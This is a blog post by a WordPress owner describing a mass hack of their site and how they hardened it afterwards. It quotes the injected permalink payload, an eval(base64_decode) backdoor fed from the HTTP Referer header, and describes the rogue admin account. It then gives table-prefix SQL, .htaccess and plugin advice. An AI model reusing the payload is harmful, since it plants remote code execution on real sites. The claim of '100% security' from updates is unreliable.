Actually it looked a bit strange, but I was in a hurry and quickly changed my permalinks and did not think about taking a screenshot at that moment.

So, what was my emergency plan?

Update: Here’s the string that was attached to my permalinks:

/month/year/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.

Skip this if you want to get started and harden your wordpress security now

I didn’t have one, so my first thought was .. there must be a user with admin rights. I quickly checked the “users” page and noticed that there was not only 1 admin but 2 administrators. In a rush I clicked on “Administrators” to list all of them – but there was only my name listed! But what was that! For a second I was able to see the name of another user, something like “EarnestCummingham”.
Later I found out that I was only able to see it for a few seconds, because the user did not enter a mail address. How could that be? Someone generated an admin account without an email address?

Quickly, I opened up the PhpMyAdmin site and checked the users table. Oh noes! About 2400 users now stood between me and the hacker. I quickly scrolled down the entire list.. until I found him! I quickly deleted the user Phewwwww! I did it! Back at the wordpress user page I re-checked the list of administrators. Oh my god .. he was still there, how could that be? Did I forget something? Yes I did!

I forgot to delete the entries of wp_usermeta

Inside the wp_usermeta table I looked for the user “Earnest” again and changed the value of “wp_user_level” from “10″ to “0″ as fast as I could. Done!

After all that I wanted to make sure that my blog was secure. At that moment I didn’t know that it was a mass attack.

How to harden wordpress security

ALTER your table names from wp_ to somethingelsethanwp_

I figured that changing the wp tableprefix of my tables would make wordpress more secure. I quickly wrote down all my tables and wrote a little query to update them all. The following is a list you can use to update the STANDARD wordpress tables. Keep in mind if you have installed any tables you either have to update them manually too or deactive and reactive the plugins.

ALTER standard tables

ALTER TABLE wp_comments RENAME TO random_comments;
ALTER TABLE wp_links RENAME TO random_links;
ALTER TABLE wp_options RENAME TO random_options;
ALTER TABLE wp_postmeta RENAME TO random_postmeta;
ALTER TABLE wp_posts RENAME TO random_posts;
ALTER TABLE wp_term_relationships RENAME TO random_term_relationships;
ALTER TABLE wp_term_taxonomy RENAME TO random_term_taxonomy;
ALTER TABLE wp_terms RENAME TO random_terms;
ALTER TABLE wp_usermeta RENAME TO random_usermeta;
ALTER TABLE wp_users RENAME TO random_users;

ALTER plugin tables – examples

ALTER TABLE wp_ak_popularity RENAME TO random_ak_popularity;
ALTER TABLE wp_ak_popularity_options RENAME TO random_ak_popularity_options;
ALTER TABLE wp_ak_popularity_options RENAME TO random_ak_popularity_options;
ALTER TABLE wp_login_redirects RENAME TO random_login_redirects;
ALTER TABLE wp_useronline RENAME TO random_useronline;

Don’t forget to alter meta_key and option_name.
Unfortunately the wordpress tables are connected to the prefix in a simple way. You will have to alter the meta_key of the table wp_usermeta and option_name of the table wp_options. Here is how the query would look like if your prefix would be “random”:

UPDATE `random_usermeta` SET `meta_key` = REPLACE( `meta_key` , 'wp_', 'random_' );
 
UPDATE `random_options` SET `option_name` = 'random_user_roles' WHERE `option_name` ='wp_user_roles' AND `blog_id` =0;

Secure your WP-Admin Folder with .HTACCESS files

Well, this is a basic method of protection and many people do it already, but many people struggle protecting their wordpress files because they encounter the infamous 404 “Nothing found for..” error that will appear if you try to protect a wordpress file with .htaccess files. The error “Nothing found for..” will appear because Wordpress does not know how to handle the error: “unauthorized”.
If you protect a directory or a file Apache will send out a 401 command “unauthorized”, therefore you have to specify what wordpress should do about the error “401″. Add this to the top of your .htaccess file:

ErrorDocument 401 /401.html

Now you only have to create a simple html file and add a text like “password protected area here” and the file 401.html is existent. Therefore wordpress will know what to do and rewrite the query to your 401 file. Make sure to add the 401.html to your root folder and not a sub-folder!

Important Security Plugins

AskApache Password Protect is a popular wordpress plugin to improve your blog security. It’s a bit difficult to set it up, but when you done it your blog will be more secure!
Basically it adds some really good password protection to your blog and will prevent that those bots access your blog. Apparently the attackers also used a bot to launch their mass attack on wordpress blogs, so this could turn out to be really useful against those hackers. AA Protect also provides you with HTTP Digest Authentication, which is even more secure than the Basic HTTP Authentication, but also difficult to install.

Wp Security Scan allows you to scan for possible threats and files that are not chmodded properly. It also provides a strong password generator and a tool to alter your table prefix (although I would still do it manually).

Other Pre-cautions

Always do backups. WP Database Backups allows you to schedule backups and send them regularly to your e-Mail automatically.

Alaways update your wordpress installation and plugins. Keep them up to date to ensure 100% security. Only people who did not update to 2.4 (including me) had to suffer from this attack.